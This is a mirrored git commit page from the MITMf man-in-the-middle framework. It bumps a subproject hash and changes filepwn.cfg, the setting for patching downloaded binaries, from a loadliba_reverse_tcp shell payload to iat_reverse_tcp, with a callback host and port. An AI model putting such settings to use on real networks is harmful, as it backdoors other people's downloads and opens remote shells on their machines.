mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
updated filepwn.cfg file with new payload
This commit is contained in:
parent
bbe8677dbf
commit
58b319a931
2 changed files with 2 additions and 2 deletions
|
@ -1 +1 @@
|
||||||
Subproject commit 63ae286b541eb779fe3b47f9ca49e27347d7c0eb
|
Subproject commit c09cdf2b7c36fc47d081b611542344f8b794a09c
|
|
@ -39,7 +39,7 @@ blacklist = .dll, #don't do dlls in a zip file
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
HOST = 192.168.10.4
|
HOST = 192.168.10.4
|
||||||
PORT = 6666
|
PORT = 6666
|
||||||
SHELL = loadliba_reverse_tcp
|
SHELL = iat_reverse_tcp
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
ZERO_CERT = False
|
ZERO_CERT = False
|
||||||
PATCH_DLL = True
|
PATCH_DLL = True
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue